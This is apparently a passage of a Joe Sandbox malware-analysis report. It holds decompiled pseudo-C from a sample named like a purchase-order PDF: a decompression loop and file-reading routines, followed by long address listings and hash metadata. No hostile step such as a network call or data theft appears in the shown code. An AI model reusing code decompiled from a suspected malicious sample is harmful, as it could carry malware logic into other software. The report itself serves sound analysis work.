                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            											__eflags = __eax -  *(__ebp - 0x74);
                                            											if(__eax >=  *(__ebp - 0x74)) {
                                            												__eax = __eax +  *(__ebp - 0x74);
                                            												__eflags = __eax;
                                            											}
                                            											__edx =  *(__ebp - 8);
                                            											__cl =  *(__eax + __edx);
                                            											__eax =  *(__ebp - 0x14);
                                            											 *(__ebp - 0x5c) = __cl;
                                            											 *(__eax + __edx) = __cl;
                                            											__eax = __eax + 1;
                                            											__edx = 0;
                                            											_t274 = __eax %  *(__ebp - 0x74);
                                            											__eax = __eax /  *(__ebp - 0x74);
                                            											__edx = _t274;
                                            											__eax =  *(__ebp - 0x68);
                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            											_t283 = __ebp - 0x64;
                                            											 *_t283 =  *(__ebp - 0x64) - 1;
                                            											__eflags =  *_t283;
                                            											 *( *(__ebp - 0x68)) = __cl;
                                            											L79:
                                            											 *(__ebp - 0x14) = __edx;
                                            											goto L80;
                                            										case 0x1c:
                                            											while(1) {
                                            												L123:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													break;
                                            												}
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__edx =  *(__ebp - 8);
                                            												__cl =  *(__eax + __edx);
                                            												__eax =  *(__ebp - 0x14);
                                            												 *(__ebp - 0x5c) = __cl;
                                            												 *(__eax + __edx) = __cl;
                                            												__eax = __eax + 1;
                                            												__edx = 0;
                                            												_t414 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t414;
                                            												__eax =  *(__ebp - 0x68);
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            												__eflags =  *(__ebp - 0x30);
                                            												 *( *(__ebp - 0x68)) = __cl;
                                            												 *(__ebp - 0x14) = _t414;
                                            												if( *(__ebp - 0x30) > 0) {
                                            													continue;
                                            												} else {
                                            													L80:
                                            													 *(__ebp - 0x88) = 2;
                                            													goto L1;
                                            												}
                                            											}
                                            											 *(__ebp - 0x88) = 0x1c;
                                            											goto L170;
                                            									}
                                            								}
                                            								L171:
                                            								_t535 = _t534 | 0xffffffff;
                                            								goto L172;
                                            							}
                                            						}
                                            					}
                                            				}
                                            			}













                                            0x00000000
                                            0x00407068
                                            0x00407068
                                            0x0040706c
                                            0x00407095
                                            0x0040709f
                                            0x0040706e
                                            0x00407077
                                            0x00407084
                                            0x00407087
                                            0x004073cb
                                            0x004073cb
                                            0x004073ce
                                            0x004073ce
                                            0x004073ce
                                            0x004073d4
                                            0x004073da
                                            0x004073e0
                                            0x004073fa
                                            0x004073fd
                                            0x00407403
                                            0x0040740e
                                            0x00407410
                                            0x004073e2
                                            0x004073e2
                                            0x004073f1
                                            0x004073f5
                                            0x004073f5
                                            0x0040741a
                                            0x00000000
                                            0x00000000
                                            0x0040741c
                                            0x00407420
                                            0x004075cf
                                            0x004075e5
                                            0x004075ed
                                            0x004075f4
                                            0x004075f6
                                            0x004075fd
                                            0x00407601
                                            0x00407601
                                            0x0040742c
                                            0x00407433
                                            0x0040743b
                                            0x0040743e
                                            0x00407441
                                            0x00407441
                                            0x00407447
                                            0x00407447
                                            0x00406be3
                                            0x00406be3
                                            0x00406be3
                                            0x00406bec
                                            0x00000000
                                            0x00000000
                                            0x00406bf2
                                            0x00000000
                                            0x00406bfd
                                            0x00000000
                                            0x00000000
                                            0x00406c06
                                            0x00406c09
                                            0x00406c0c
                                            0x00406c10
                                            0x00000000
                                            0x00000000
                                            0x00406c16
                                            0x00406c19
                                            0x00406c1b
                                            0x00406c1c
                                            0x00406c1f
                                            0x00406c21
                                            0x00406c22
                                            0x00406c24
                                            0x00406c27
                                            0x00406c2c
                                            0x00406c31
                                            0x00406c3a
                                            0x00406c4d
                                            0x00406c50
                                            0x00406c5c
                                            0x00406c84
                                            0x00406c86
                                            0x00406c94
                                            0x00406c94
                                            0x00406c98
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406c88
                                            0x00406c88
                                            0x00406c8b
                                            0x00406c8c
                                            0x00406c8c
                                            0x00000000
                                            0x00406c88
                                            0x00406c62
                                            0x00406c67
                                            0x00406c67
                                            0x00406c70
                                            0x00406c78
                                            0x00406c7b
                                            0x00000000
                                            0x00406c81
                                            0x00406c81
                                            0x00000000
                                            0x00406c81
                                            0x00000000
                                            0x00406c9e
                                            0x00406c9e
                                            0x00406ca2
                                            0x0040754e
                                            0x00000000
                                            0x0040754e
                                            0x00406cab
                                            0x00406cbb
                                            0x00406cbe
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc4
                                            0x00406cc8
                                            0x00000000
                                            0x00000000
                                            0x00406cca
                                            0x00406cd0
                                            0x00406cfa
                                            0x00406d00
                                            0x00406d07
                                            0x00000000
                                            0x00406d07
                                            0x00406cd6
                                            0x00406cd9
                                            0x00406cde
                                            0x00406cde
                                            0x00406ce9
                                            0x00406cf1
                                            0x00406cf4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d39
                                            0x00406d3f
                                            0x00406d42
                                            0x00406d4f
                                            0x00406d57
                                            0x004073cb
                                            0x00000000
                                            0x00000000
                                            0x00406d0e
                                            0x00406d0e
                                            0x00406d12
                                            0x0040755d
                                            0x00000000
                                            0x0040755d
                                            0x00406d1e
                                            0x00406d29
                                            0x00406d29
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d32
                                            0x00406d37
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004073ce
                                            0x004073ce
                                            0x004073d4
                                            0x004073da
                                            0x004073e0
                                            0x004073fa
                                            0x004073fd
                                            0x00407403
                                            0x0040740e
                                            0x00407410
                                            0x004073e2
                                            0x004073e2
                                            0x004073f1
                                            0x004073f5
                                            0x004073f5
                                            0x0040741a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d5f
                                            0x00406d61
                                            0x00406d64
                                            0x00406dd5
                                            0x00406dd8
                                            0x00406ddb
                                            0x00406de2
                                            0x00406dec
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x004073cb
                                            0x00406d66
                                            0x00406d6a
                                            0x00406d6d
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d75
                                            0x00406d77
                                            0x00406d7a
                                            0x00406d7c
                                            0x00406d81
                                            0x00406d84
                                            0x00406d87
                                            0x00406d8b
                                            0x00406d92
                                            0x00406d95
                                            0x00406d9c
                                            0x00406da0
                                            0x00406da8
                                            0x00406da8
                                            0x00406da8
                                            0x00406da2
                                            0x00406da2
                                            0x00406da2
                                            0x00406d97
                                            0x00406d97
                                            0x00406d97
                                            0x00406dac
                                            0x00406daf
                                            0x00406dcd
                                            0x00406dcf
                                            0x00000000
                                            0x00406db1
                                            0x00406db1
                                            0x00406db4
                                            0x00406db7
                                            0x00406dba
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbf
                                            0x00406dc2
                                            0x00406dc4
                                            0x00406dc5
                                            0x00406dc8
                                            0x00000000
                                            0x00406dc8
                                            0x00000000
                                            0x00406ffe
                                            0x00407002
                                            0x00407020
                                            0x00407023
                                            0x0040702a
                                            0x0040702d
                                            0x00407030
                                            0x00407033
                                            0x00407036
                                            0x00407039
                                            0x0040703b
                                            0x00407042
                                            0x00407043
                                            0x00407045
                                            0x00407048
                                            0x0040704b
                                            0x0040704e
                                            0x0040704e
                                            0x00407053
                                            0x00000000
                                            0x00407053
                                            0x00407004
                                            0x00407007
                                            0x0040700a
                                            0x00407014
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004070ab
                                            0x004070af
                                            0x00000000
                                            0x00000000
                                            0x004070b5
                                            0x004070b9
                                            0x00000000
                                            0x00000000
                                            0x004070bf
                                            0x004070c1
                                            0x004070c5
                                            0x004070c5
                                            0x004070c8
                                            0x004070cc
                                            0x00000000
                                            0x00000000
                                            0x0040711c
                                            0x00407120
                                            0x00407127
                                            0x0040712a
                                            0x0040712d
                                            0x00407137
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x004073cb
                                            0x00407122
                                            0x00000000
                                            0x00000000
                                            0x00407143
                                            0x00407147
                                            0x0040714e
                                            0x00407151
                                            0x00407154
                                            0x00407149
                                            0x00407149
                                            0x00407149
                                            0x00407157
                                            0x0040715a
                                            0x0040715d
                                            0x0040715d
                                            0x00407160
                                            0x00407163
                                            0x00407166
                                            0x00407166
                                            0x00407169
                                            0x00407170
                                            0x00407175
                                            0x00000000
                                            0x00000000
                                            0x00407203
                                            0x00407203
                                            0x00407207
                                            0x004075a5
                                            0x00000000
                                            0x004075a5
                                            0x0040720d
                                            0x00407210
                                            0x00407213
                                            0x00407217
                                            0x0040721a
                                            0x00407220
                                            0x00407222
                                            0x00407222
                                            0x00407222
                                            0x00407225
                                            0x00407228
                                            0x00000000
                                            0x00000000
                                            0x00406df8
                                            0x00406df8
                                            0x00406dfc
                                            0x00407569
                                            0x00000000
                                            0x00407569
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0c
                                            0x00406e0f
                                            0x00406e15
                                            0x00406e17
                                            0x00406e17
                                            0x00406e17
                                            0x00406e1a
                                            0x00406e1d
                                            0x00406e1d
                                            0x00406e20
                                            0x00406e23
                                            0x00000000
                                            0x00000000
                                            0x00406e29
                                            0x00406e2f
                                            0x00000000
                                            0x00000000
                                            0x00406e35
                                            0x00406e35
                                            0x00406e39
                                            0x00406e3c
                                            0x00406e3f
                                            0x00406e42
                                            0x00406e45
                                            0x00406e46
                                            0x00406e49
                                            0x00406e4b
                                            0x00406e51
                                            0x00406e54
                                            0x00406e57
                                            0x00406e5a
                                            0x00406e5d
                                            0x00406e60
                                            0x00406e63
                                            0x00406e7f
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8f
                                            0x00406e93
                                            0x00406e95
                                            0x00406e99
                                            0x00406e65
                                            0x00406e65
                                            0x00406e69
                                            0x00406e71
                                            0x00406e76
                                            0x00406e78
                                            0x00406e7a
                                            0x00406e7a
                                            0x00406e9c
                                            0x00406ea3
                                            0x00406ea6
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406eb5
                                            0x00407575
                                            0x00000000
                                            0x00407575
                                            0x00406ebb
                                            0x00406ebe
                                            0x00406ec1
                                            0x00406ec5
                                            0x00406ec8
                                            0x00406ece
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed3
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406edc
                                            0x00000000
                                            0x00000000
                                            0x00406ede
                                            0x00406ee1
                                            0x00406ee4
                                            0x00406ee7
                                            0x00406eea
                                            0x00406eed
                                            0x00406ef0
                                            0x00406ef3
                                            0x00406ef6
                                            0x00406ef9
                                            0x00406efc
                                            0x00406f14
                                            0x00406f17
                                            0x00406f1a
                                            0x00406f1d
                                            0x00406f1d
                                            0x00406f20
                                            0x00406f24
                                            0x00406f26
                                            0x00406efe
                                            0x00406efe
                                            0x00406f06
                                            0x00406f0b
                                            0x00406f0d
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f29
                                            0x00406f30
                                            0x00406f33
                                            0x00000000
                                            0x00406f35
                                            0x00000000
                                            0x00406f35
                                            0x00406f33
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00000000
                                            0x00000000
                                            0x00406f75
                                            0x00406f75
                                            0x00406f79
                                            0x00407581
                                            0x00000000
                                            0x00407581
                                            0x00406f7f
                                            0x00406f82
                                            0x00406f85
                                            0x00406f89
                                            0x00406f8c
                                            0x00406f92
                                            0x00406f94
                                            0x00406f94
                                            0x00406f94
                                            0x00406f97
                                            0x00406f9a
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406f3e
                                            0x00406f3e
                                            0x00406f41
                                            0x00000000
                                            0x00406f41
                                            0x00406fa2
                                            0x00406fa2
                                            0x00406fa5
                                            0x00406fa8
                                            0x00406fab
                                            0x00406fae
                                            0x00406fb1
                                            0x00406fb4
                                            0x00406fb7
                                            0x00406fba
                                            0x00406fbd
                                            0x00406fc0
                                            0x00406fd8
                                            0x00406fdb
                                            0x00406fde
                                            0x00406fe1
                                            0x00406fe1
                                            0x00406fe4
                                            0x00406fe8
                                            0x00406fea
                                            0x00406fc2
                                            0x00406fc2
                                            0x00406fca
                                            0x00406fcf
                                            0x00406fd1
                                            0x00406fd3
                                            0x00406fd3
                                            0x00406fed
                                            0x00406ff4
                                            0x00406ff7
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00407286
                                            0x00407286
                                            0x0040728a
                                            0x004075b1
                                            0x00000000
                                            0x004075b1
                                            0x00407290
                                            0x00407293
                                            0x00407296
                                            0x0040729a
                                            0x0040729d
                                            0x004072a3
                                            0x004072a5
                                            0x004072a5
                                            0x004072a5
                                            0x004072a8
                                            0x00000000
                                            0x00000000
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x00000000
                                            0x00407395
                                            0x00407399
                                            0x004073bb
                                            0x004073be
                                            0x004073c8
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x004073cb
                                            0x0040739b
                                            0x0040739e
                                            0x004073a2
                                            0x004073a5
                                            0x004073a5
                                            0x004073a8
                                            0x00000000
                                            0x00000000
                                            0x00407452
                                            0x00407456
                                            0x00407474
                                            0x00407474
                                            0x00407474
                                            0x0040747b
                                            0x00407482
                                            0x00407489
                                            0x00407489
                                            0x00000000
                                            0x00407489
                                            0x00407458
                                            0x0040745b
                                            0x0040745e
                                            0x00407461
                                            0x00407468
                                            0x004073ac
                                            0x004073ac
                                            0x004073af
                                            0x00000000
                                            0x00000000
                                            0x00407543
                                            0x00407546
                                            0x00407447
                                            0x00000000
                                            0x00000000
                                            0x0040717d
                                            0x0040717f
                                            0x00407186
                                            0x00407187
                                            0x00407189
                                            0x0040718c
                                            0x00000000
                                            0x00000000
                                            0x00407194
                                            0x00407197
                                            0x0040719a
                                            0x0040719c
                                            0x0040719e
                                            0x0040719e
                                            0x0040719f
                                            0x004071a2
                                            0x004071a9
                                            0x004071ac
                                            0x004071ba
                                            0x00000000
                                            0x00000000
                                            0x00407490
                                            0x00407490
                                            0x00407493
                                            0x0040749a
                                            0x00000000
                                            0x00000000
                                            0x0040749f
                                            0x0040749f
                                            0x004074a3
                                            0x004075db
                                            0x00000000
                                            0x004075db
                                            0x004074a9
                                            0x004074ac
                                            0x004074af
                                            0x004074b3
                                            0x004074b6
                                            0x004074bc
                                            0x004074be
                                            0x004074be
                                            0x004074be
                                            0x004074c1
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c7
                                            0x004074c7
                                            0x004074cb
                                            0x0040752b
                                            0x0040752e
                                            0x00407533
                                            0x00407534
                                            0x00407536
                                            0x00407538
                                            0x0040753b
                                            0x00407447
                                            0x00407447
                                            0x00000000
                                            0x0040744d
                                            0x00407447
                                            0x004074cd
                                            0x004074d3
                                            0x004074d6
                                            0x004074d9
                                            0x004074dc
                                            0x004074df
                                            0x004074e2
                                            0x004074e5
                                            0x004074e8
                                            0x004074eb
                                            0x004074ee
                                            0x00407507
                                            0x0040750a
                                            0x0040750d
                                            0x00407510
                                            0x00407514
                                            0x00407516
                                            0x00407516
                                            0x00407517
                                            0x0040751a
                                            0x004074f0
                                            0x004074f0
                                            0x004074f8
                                            0x004074fd
                                            0x004074ff
                                            0x00407502
                                            0x00407502
                                            0x0040751d
                                            0x00407524
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x004071c2
                                            0x004071c5
                                            0x004071fb
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732e
                                            0x0040732e
                                            0x00407331
                                            0x00407333
                                            0x004075bd
                                            0x00000000
                                            0x004075bd
                                            0x00407339
                                            0x0040733c
                                            0x00000000
                                            0x00000000
                                            0x00407342
                                            0x00407346
                                            0x00407349
                                            0x00407349
                                            0x00407349
                                            0x00000000
                                            0x00407349
                                            0x004071c7
                                            0x004071c9
                                            0x004071cb
                                            0x004071cd
                                            0x004071d0
                                            0x004071d1
                                            0x004071d3
                                            0x004071d5
                                            0x004071d8
                                            0x004071db
                                            0x004071f1
                                            0x004071f6
                                            0x0040722e
                                            0x0040722e
                                            0x00407232
                                            0x0040725e
                                            0x00407260
                                            0x00407267
                                            0x0040726a
                                            0x0040726d
                                            0x0040726d
                                            0x00407272
                                            0x00407272
                                            0x00407274
                                            0x00407277
                                            0x0040727e
                                            0x00407281
                                            0x004072ae
                                            0x004072ae
                                            0x004072b1
                                            0x004072b4
                                            0x00407328
                                            0x00407328
                                            0x00407328
                                            0x00000000
                                            0x00407328
                                            0x004072b6
                                            0x004072bc
                                            0x004072bf
                                            0x004072c2
                                            0x004072c5
                                            0x004072c8
                                            0x004072cb
                                            0x004072ce
                                            0x004072d1
                                            0x004072d4
                                            0x004072d7
                                            0x004072f0
                                            0x004072f2
                                            0x004072f5
                                            0x004072f6
                                            0x004072f9
                                            0x004072fb
                                            0x004072fe
                                            0x00407300
                                            0x00407302
                                            0x00407305
                                            0x00407307
                                            0x0040730a
                                            0x0040730e
                                            0x00407310
                                            0x00407310
                                            0x00407311
                                            0x00407314
                                            0x00407317
                                            0x004072d9
                                            0x004072d9
                                            0x004072e1
                                            0x004072e6
                                            0x004072e8
                                            0x004072eb
                                            0x004072eb
                                            0x0040731a
                                            0x00407321
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x00000000
                                            0x00407323
                                            0x00000000
                                            0x00407323
                                            0x00407321
                                            0x00407234
                                            0x00407237
                                            0x00407239
                                            0x0040723c
                                            0x0040723f
                                            0x00407242
                                            0x00407244
                                            0x00407247
                                            0x0040724a
                                            0x0040724a
                                            0x0040724d
                                            0x0040724d
                                            0x00407250
                                            0x00407257
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x00000000
                                            0x00407259
                                            0x00000000
                                            0x00407259
                                            0x00407257
                                            0x004071dd
                                            0x004071e0
                                            0x004071e2
                                            0x004071e5
                                            0x00000000
                                            0x00000000
                                            0x00406f44
                                            0x00406f44
                                            0x00406f48
                                            0x0040758d
                                            0x00000000
                                            0x0040758d
                                            0x00406f4e
                                            0x00406f51
                                            0x00406f54
                                            0x00406f57
                                            0x00406f5a
                                            0x00406f5d
                                            0x00406f60
                                            0x00406f62
                                            0x00406f65
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6d
                                            0x00406f6d
                                            0x00406f6d
                                            0x00000000
                                            0x00000000
                                            0x004070cf
                                            0x004070cf
                                            0x004070d3
                                            0x00407599
                                            0x00000000
                                            0x00407599
                                            0x004070d9
                                            0x004070dc
                                            0x004070df
                                            0x004070e2
                                            0x004070e4
                                            0x004070e4
                                            0x004070e4
                                            0x004070e7
                                            0x004070ea
                                            0x004070ed
                                            0x004070f0
                                            0x004070f3
                                            0x004070f6
                                            0x004070f7
                                            0x004070f9
                                            0x004070f9
                                            0x004070f9
                                            0x004070fc
                                            0x004070ff
                                            0x00407102
                                            0x00407105
                                            0x00407105
                                            0x00407105
                                            0x00407108
                                            0x0040710a
                                            0x0040710a
                                            0x00000000
                                            0x00000000
                                            0x0040734c
                                            0x0040734c
                                            0x0040734c
                                            0x00407350
                                            0x00000000
                                            0x00000000
                                            0x00407356
                                            0x00407359
                                            0x0040735c
                                            0x0040735f
                                            0x00407361
                                            0x00407361
                                            0x00407361
                                            0x00407364
                                            0x00407367
                                            0x0040736a
                                            0x0040736d
                                            0x00407370
                                            0x00407373
                                            0x00407374
                                            0x00407376
                                            0x00407376
                                            0x00407376
                                            0x00407379
                                            0x0040737c
                                            0x0040737f
                                            0x00407382
                                            0x00407385
                                            0x00407389
                                            0x0040738b
                                            0x0040738e
                                            0x00000000
                                            0x00407390
                                            0x0040710d
                                            0x0040710d
                                            0x00000000
                                            0x0040710d
                                            0x0040738e
                                            0x004075c3
                                            0x00000000
                                            0x00000000
                                            0x00406bf2
                                            0x004075fa
                                            0x004075fa
                                            0x00000000
                                            0x004075fa
                                            0x00407447
                                            0x004073ce
                                            0x004073cb

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                            • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                            • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                            • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00403479(intOrPtr _a4) {
                                            				intOrPtr _t11;
                                            				signed int _t12;
                                            				void* _t14;
                                            				void* _t15;
                                            				long _t16;
                                            				void* _t18;
                                            				intOrPtr _t31;
                                            				intOrPtr _t34;
                                            				intOrPtr _t36;
                                            				void* _t37;
                                            				intOrPtr _t49;
                                            
                                            				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                                            				 *0x42a26c = GetTickCount() + 0x1f4;
                                            				if(_t34 <= 0) {
                                            					L22:
                                            					E0040302E(1);
                                            					return 0;
                                            				}
                                            				E004035F8( *0x420f04);
                                            				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                            				 *0x420f00 = _t34;
                                            				 *0x420ef0 = 0;
                                            				while(1) {
                                            					_t31 = 0x4000;
                                            					_t11 =  *0x420ef8 -  *0x420f04;
                                            					if(_t11 <= 0x4000) {
                                            						_t31 = _t11;
                                            					}
                                            					_t12 = E004035E2(0x414ef0, _t31);
                                            					if(_t12 == 0) {
                                            						break;
                                            					}
                                            					 *0x420f04 =  *0x420f04 + _t31;
                                            					 *0x40ce80 = 0x414ef0;
                                            					 *0x40ce84 = _t31;
                                            					L6:
                                            					L6:
                                            					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                            						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                                            						E0040302E(0);
                                            					}
                                            					 *0x40ce88 = 0x40cef0;
                                            					 *0x40ce8c = 0x8000; // executed
                                            					_t14 = E00406BB0(0x40ce68); // executed
                                            					if(_t14 < 0) {
                                            						goto L20;
                                            					}
                                            					_t36 =  *0x40ce88; // 0x412588
                                            					_t37 = _t36 - 0x40cef0;
                                            					if(_t37 == 0) {
                                            						__eflags =  *0x40ce84; // 0x0
                                            						if(__eflags != 0) {
                                            							goto L20;
                                            						}
                                            						__eflags = _t31;
                                            						if(_t31 == 0) {
                                            							goto L20;
                                            						}
                                            						L16:
                                            						_t16 =  *0x420ef4;
                                            						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                            							continue;
                                            						}
                                            						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                            						goto L22;
                                            					}
                                            					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                            					if(_t18 == 0) {
                                            						_push(0xfffffffe);
                                            						L21:
                                            						_pop(_t15);
                                            						return _t15;
                                            					}
                                            					 *0x40ce60 =  *0x40ce60 + _t37;
                                            					_t49 =  *0x40ce84; // 0x0
                                            					if(_t49 != 0) {
                                            						goto L6;
                                            					}
                                            					goto L16;
                                            					L20:
                                            					_push(0xfffffffd);
                                            					goto L21;
                                            				}
                                            				return _t12 | 0xffffffff;
                                            			}














                                            0x00403489
                                            0x0040349c
                                            0x004034a1
                                            0x004035d1
                                            0x004035d3
                                            0x00000000
                                            0x004035d9
                                            0x004034ad
                                            0x004034c0
                                            0x004034c6
                                            0x004034cc
                                            0x004034d7
                                            0x004034dc
                                            0x004034e1
                                            0x004034e9
                                            0x004034eb
                                            0x004034eb
                                            0x004034f4
                                            0x004034fb
                                            0x00000000
                                            0x00000000
                                            0x00403501
                                            0x00403507
                                            0x0040350d
                                            0x00000000
                                            0x00403513
                                            0x00403519
                                            0x00403539
                                            0x0040353e
                                            0x00403543
                                            0x00403549
                                            0x0040354f
                                            0x00403559
                                            0x00403560
                                            0x00000000
                                            0x00000000
                                            0x00403562
                                            0x00403568
                                            0x0040356a
                                            0x0040358d
                                            0x00403593
                                            0x00000000
                                            0x00000000
                                            0x00403595
                                            0x00403597
                                            0x00000000
                                            0x00000000
                                            0x00403599
                                            0x00403599
                                            0x004035ac
                                            0x00000000
                                            0x00000000
                                            0x004035bb
                                            0x00000000
                                            0x004035bb
                                            0x00403574
                                            0x0040357b
                                            0x004035c8
                                            0x004035ce
                                            0x004035ce
                                            0x00000000
                                            0x004035ce
                                            0x0040357d
                                            0x00403583
                                            0x00403589
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004035cc
                                            0x004035cc
                                            0x00000000
                                            0x004035cc
                                            0x00000000

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 0040348D
                                              • Part of subcall function 004035F8: SetFilePointer.KERNEL32(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                            • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: FilePointer$CountTick
                                            • String ID:
                                            • API String ID: 1092082344-0
                                            • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                            • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                            • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                            • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                            				long _v8;
                                            				long _t21;
                                            				long _t22;
                                            				void* _t24;
                                            				long _t26;
                                            				int _t27;
                                            				long _t28;
                                            				void* _t29;
                                            				void* _t30;
                                            				long _t31;
                                            				long _t32;
                                            				long _t36;
                                            
                                            				_t21 = _a4;
                                            				if(_t21 >= 0) {
                                            					_t32 = _t21 +  *0x42a2b8;
                                            					 *0x420ef4 = _t32;
                                            					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                            				}
                                            				_t22 = E00403479(4);
                                            				if(_t22 >= 0) {
                                            					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                            					if(_t24 == 0) {
                                            						L18:
